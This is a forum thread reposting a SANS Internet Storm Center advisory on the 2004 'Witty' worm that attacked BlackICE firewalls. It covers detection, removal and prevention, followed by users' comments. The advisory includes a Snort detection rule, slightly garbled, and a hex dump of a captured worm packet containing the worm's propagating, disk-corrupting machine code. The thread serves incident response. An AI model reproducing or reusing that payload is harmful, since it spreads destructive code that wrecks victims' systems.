Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: "Witty" BlackICE Worm (Internet Threat Level: Yellow!)

  1. #1
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323

    Exclamation "Witty" BlackICE Worm (Internet Threat Level: Yellow!)

    I've bolded the immediate fix for this. When I was in Windows I used to use this product. Guess not any more... :(

    Source: Internet Storm Center

    "Witty" worm attacks BlackICE firewall

    Summary
    =======

    At around 12:00 AM EST (05:00 UTC) on Saturday, we detected an upsurge in UDP traffic from source port 4000. This traffic is caused by a new worm ("Witty") which exploits a vulnerability in BlackIce's ICQ parser. Later today, variations of the worm apparently used source ports other then port 4000. However, it is not clear if this is a new variant or a side effect caused by NAT.
    Given that this worm generates large amounts of traffic, and the wide spread use of BlackIce, we will keep the InfoCon level at 'YELLOW', likely until Monday morning.

    Detection
    =========

    Infected hosts will send large amounts of UDP traffic, typically saturating a local network connection. The BlackIce task bar icon will no longer allow the user to shut down BlackIce. It will display a message reading "Operation could not be completed. Access is denied".
    Eventually, the system will crash. Infected systems are reported to show corrupted hard disks.
    The worm will not write itself to disk. As a result, Virus scanners may not detect it.
    Snort rule:

    lert udp any 4000:5000 -> any any (msg:"Witty Initial Traffic";
    content:"|29202020202020696e73657274207769747479206d6573736167652068657265|";re\v:1;)

    (note: you may want to remove the source port restriction)

    Removal
    =======

    A reboot will remove the worm from the system. However, the worm causes random hard disk corruption and the system may no longer function.

    Prevention
    ==========

    Disconnect systems running BlackIce as soon as possible! Due to recent versions of this worm using various source ports, packet filters are likely ineffective. You would have to block ALL UDP TRAFFIC, which may cause disruption of many valid services.
    However, given that this worm will corrupt hard disks and leave systems unusable, it may be advisable to take this drastic measure until individual systems can be attended to.
    The latest version of BlackIce, released this Wednesday, is the only version which is likely safe. It is identified by the letter 'g' at the end of its version. For example:
    BlackIce 3.6 ccf and BlackIce 3.6 ecf are vulnerable
    BlackIce 3.6 ccg and BlackIce 3.6 ecg are likely safe

    Other ISS products may be vulnerable as well. Please refer to ISS for details (see end of this post for links).

    Links
    =====
    ISS Black Ice downloads:http://blackice.iss.net/update_center/index.php
    Vulnerability Information:http://xforce.iss.net/xforce/alerts/id/166
    F-Secure Writeup:http://www.f-secure.com/v-descs/witty.shtml
    Symantec:http://securityresponse.symantec.com...itty.worm.html

    Sample Packet
    =============

    01:54:45.699383 219.154.156.161.4000 > 65.173.218.164.50212: udp 997
    0x0000 4500 0401 d3b4 0000 7111 dda9 db9a 9ca1 E.......q.......
    0x0010 41ad daa4 0fa0 c424 03ed dd38 0500 0000 A......$...8....
    0x0020 0000 0012 0200 0000 0000 0000 0000 0000 ................
    0x0030 0002 2c00 0500 0000 0000 006e 0000 0000 ..,........n....
    0x0040 0000 0000 0000 0000 0000 0000 0001 0000 ................
    0x0050 0000 0000 0000 0000 0000 0000 0000 0000 ................
    0x0060 4102 0500 0000 0000 00de 0300 0000 0000 A...............
    0x0070 0000 0000 0000 0000 0000 0100 0001 0000 ................
    0x0080 0100 001e 0220 2020 2020 2020 285e 2e5e ............(^.^
    0x0090 2920 2020 2020 2069 6e73 6572 7420 7769 )......insert.wi
    0x00a0 7474 7920 6d65 7373 6167 6520 6865 7265 tty.message.here
    0x00b0 2e20 2020 2020 2028 5e2e 5e29 2020 2020 .......(^.^)....
    0x00c0 2020 2089 e78b 7f14 83c7 0881 c4e8 fdff ................
    0x00d0 ff31 c966 b933 3251 6877 7332 5f54 3eff .1.f.32Qhws2_T>.
    0x00e0 159c 400d 5e89 c331 c966 b965 7451 6873 ..@.^..1.f.etQhs
    0x00f0 6f63 6b54 533e ff15 9840 0d5e 6a11 6a02 ockTS>...@.^j.j.
    0x0100 6a02 ffd0 89c6 31c9 5168 6269 6e64 5453 j.....1.QhbindTS
    0x0110 3eff 1598 400d 5e31 c951 5151 81e9 feff >...@.^1.QQQ....
    0x0120 f05f 5189 e16a 1051 56ff d031 c966 b974 ._Q..j.QV..1.f.t
    0x0130 6f51 6873 656e 6454 533e ff15 9840 0d5e oQhsendTS>...@.^
    0x0140 89c3 83c4 3c31 c951 6865 6c33 3268 6b65 ....<1.Qhel32hke
    0x0150 726e 543e ff15 9c40 0d5e 31c9 5168 6f75 rnT>...@.^1.Qhou
    0x0160 6e74 6869 636b 4368 4765 7454 5450 3eff nthickChGetTTP>.
    0x0170 1598 400d 5eff d089 c583 c41c 31c9 81e9 ..@.^.......1...
    0x0180 e0b1 ffff 5131 c02d 03bc fcff f7e5 2d3d ....Q1.-......-=
    0x0190 61d9 ff89 c131 c02d 03bc fcff f7e1 2d3d a....1.-......-=
    0x01a0 61d9 ff89 c531 d252 52c1 e910 6689 c850 a....1.RR...f..P
    0x01b0 31c0 2d03 bcfc fff7 e52d 3d61 d9ff 89c5 1.-......-=a....
    0x01c0 30e4 b002 5089 e06a 1050 31c0 502d 03bc 0...P..j.P1.P-..
    0x01d0 fcff f7e5 2d3d 61d9 ff89 c5c1 e817 80c4 ....-=a.........
    0x01e0 0350 5756 ffd3 83c4 1059 e298 31c0 2d03 .PWV.....Y..1.-.
    0x01f0 bcfc fff7 e52d 3d61 d9ff 89c5 c1e8 1080 .....-=a........
    0x0200 e407 80cc 30b0 4550 6844 5249 5668 4943 ....0.EPhDRIVhIC
    0x0210 414c 6850 4859 5368 5c5c 2e5c 89e0 31c9 ALhPHYSh\\.\..1.
    0x0220 51b2 20c1 e218 526a 0351 6a03 d1e2 5250 Q.....Rj.Qj...RP
    0x0230 3eff 15dc 400d 5e83 c414 31c9 81e9 e0b1 >...@.^...1.....
    0x0240 ffff 3dff ffff ff0f 8437 ffff ff56 89c6 ..=......7...V..
    0x0250 31c0 5050 2d03 bcfc fff7 e52d 3d61 d9ff 1.PP-......-=a..
    0x0260 89c5 d1e8 6689 c850 563e ff15 c440 0d5e ....f..PV>...@.^
    0x0270 31c9 5189 e251 52b5 80d1 e151 b15e c1e1 1.Q..QR....Q.^..
    0x0280 1851 563e ff15 9440 0d5e 563e ff15 3840 .QV>...@.^V>..8@
    0x0290 0d5e 5e5e e9ac feff ff63 7607 5ee9 21fe .^^^.....cv.^.!.
    0x02a0 ffff 0043 666a 7663 6c62 3431 5051 3530 ...Cfjvclb41PQ50
    0x02b0 6a48 3150 6334 5051 5559 4878 3774 654f jH1Pc4PQUYHx7teO
    0x02c0 7a54 5354 5954 654c 4d41 0d0a 446c 4433 zTSTYTeLMA..DlD3
    0x02d0 5237 6c56 7442 4375 6b6b 6864 7a2b 3276 R7lVtBCukkhdz+2v
    0x02e0 6f75 3033 4163 3557 4f52 6b75 7172 6764 ou03Ac5WORkuqrgd
    0x02f0 4b72 7531 5a49 4f43 6c53 522f 7851 4f69 Kru1ZIOClSR/xQOi
    0x0300 4b6f 3648 7a4a 7567 5272 4934 7337 4f6b Ko6HzJugRrI4s7Ok
    0x0310 534b 7750 714c 7534 0d0a 3562 614e 6252 SKwPqLu4..5baNbR
    0x0320 3067 504e 5950 4000 3406 b662 4044 5219 0gPNYP@.4..b@DR.
    0x0330 928e 0442 6741 6241 4630 4544 4141 5741 ...BgAbAF0EDAAWA
    0x0340 4141 4141 4141 4141 4131 3833 223e 0a20 AAAAAAAAA183">..
    0x0350 2020 2020 8001 0000 4600 0000 4600 0000 ........F...F...
    0x0360 8000 0000 0200 0000 66cc 5b40 ef1c 0d00 ........f.[@....
    0x0370 83e1 00b0 1100 0600 d003 0000 d003 0000 ................
    0x0380 0004 0000 0200 0000 aacc 5b40 0e27 0700 ..........[@.'..
    0x0390 83e1 0000 0000 0002 00b0 d02b a49b 0800 ...........+....
    0x03a0 4500 03c2 0a72 0000 8011 0000 83e1 1bb1 E....r..........
    0x03b0 ba54 02a2 0fa0 06a5 03ae eb72 0500 0000 .T.........r....
    0x03c0 0000 0012 0200 0000 0000 0000 0000 0000 ................
    0x03d0 0002 2c00 0500 0000 0000 006e 0000 0000 ..,........n....
    0x03e0 0000 0000 0000 0032 5e80 1d33 1d20 0c95 .......2^..3....
    0x03f0 8310 167b 1100 0700 4600 0000 4600 0000 ...{....F...F...
    0x0400 80 .

    -----------------------------------------------------------------------
    Johannes Ullrich, jullrich_AT_sans.org SANS Institute.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  2. #2
    Senior Member
    Join Date
    Sep 2003
    Posts
    500
    Well thanks the gods that I removed that program a long time ago!
    You shall no longer take things at second or third hand,
    nor look through the eyes of the dead...You shall listen to all
    sides and filter them for your self.
    -Walt Whitman-

  3. #3
    Senior Member nihil's Avatar
    Join Date
    Jul 2003
    Location
    United Kingdom: Bridlington
    Posts
    17,188
    Yes I dumped the "free" version.........it did not seem to do well in any of the reviews/tests?

    I also noticed that it only detected "shields up" by "cheating" (hard coded )

    Not very impressive IMHO

    Cheers

  4. #4
    Wow they attacking AVs itself now heh...at least i never used BlackIce cause NOrton AV is good enough, you think they might start attacking Norton and McAfee too some time in the future?

  5. #5
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    Wow they attacking AVs itself now heh...at least i never used BlackIce cause NOrton AV is good enough, you think they might start attacking Norton and McAfee too some time in the future?
    Umm.. BlackICE Defender is a firewall, not an AV. AVs have always been targetted by viruses (someviruses will try to shut it down). But I think this is the first worm I've seen that targets a firewall specifically.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  6. #6
    Junior Member
    Join Date
    Mar 2004
    Posts
    1
    1st allow me to say Hello, nice to be here, and I think you all have a wonderful site.

    It seems that ISS knew of this vulnerability for sometime before it was taken advantage of,
    and that proper updating of your programs ( however un-nearvingly often with BI ) would
    have kept you safe and buttoned up.

    Here is their full report on it.

  7. #7
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,323
    An update from Incidents Storm Center

    Witty Worm Wrap-up

    For our more technical discussion about the Witty worm, see Saturdays diary:
    http://isc.sans.org/diary.html?date=2004-03-20

    We expect to return to infocon 'GREEN' later today.

    Witty Worm Traffic

    Infected machines generated outbound UDP traffic at line speed, frequently saturating local area networks. As a result, the traffic generated was high compared to the number of infected hosts. At this time, we have reports for about 20,000 unique IP addresses sending UDP packets from port 4000 over the weekend. The traffic rose very fast, and dropped within the first hour. This is likely a result of the Witty worm's destructive component, which will crash infected systems and prevent them from rebooting.

    Graphs

    Witty traffic (packets reported):http://isc.sans.org/images/witty1.jpg
    Unique IPs per hour:http://isc.sans.org/images/witty2.jpg
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  8. #8
    AntiOnline Senior Member souleman's Avatar
    Join Date
    Oct 2001
    Location
    Flint, MI
    Posts
    2,883
    Not bad, they release the "g" versions on the 19th and the worm is first seen on the 20th. That is just odd.

    The report that Mischief mentioned said that the version from March 9th was safe, but the date of the g version on the website in the 19th, so if a release was done on the 9th, that would be the f version, and the ISC says that that version is vulnerable.

    This is the first one that attacks firewalls directly that I know of, but I believe some have tried to shut down a firewall, just like they shut down the AV. There are also things like old Kerio Personal Firewall Replay attack that could have been written into a worm, but I don't remember ever hearing about that happening.
    \"Ignorance is bliss....
    but only for your enemy\"
    -- souleman

  9. #9
    Jaded Network Admin nebulus200's Avatar
    Join Date
    Jun 2002
    Posts
    1,356
    Originally posted here by souleman
    Not bad, they release the "g" versions on the 19th and the worm is first seen on the 20th. That is just odd.

    The report that Mischief mentioned said that the version from March 9th was safe, but the date of the g version on the website in the 19th, so if a release was done on the 9th, that would be the f version, and the ISC says that that version is vulnerable.

    This is the first one that attacks firewalls directly that I know of, but I believe some have tried to shut down a firewall, just like they shut down the AV. There are also things like old Kerio Personal Firewall Replay attack that could have been written into a worm, but I don't remember ever hearing about that happening.
    IMHO the attack targeted the ISS Realsecure products that provide Intrustion Detection. It was a parsing vulnerability in their signatures that the worm used to gain access and if I had to guess I would say it is IDS functionality in the Blackice firewall that was effected, not so much the firewall itself.

    May be way off base here, but given what I have read on the vulnerability, I think it was geared more towards their IDS products...
    There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.

    (Merovingian - Matrix Reloaded)

  10. #10
    Junior Member
    Join Date
    Mar 2004
    Posts
    1
    i use mcaffe and zone alarm never heard of the BlackICE firewall

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •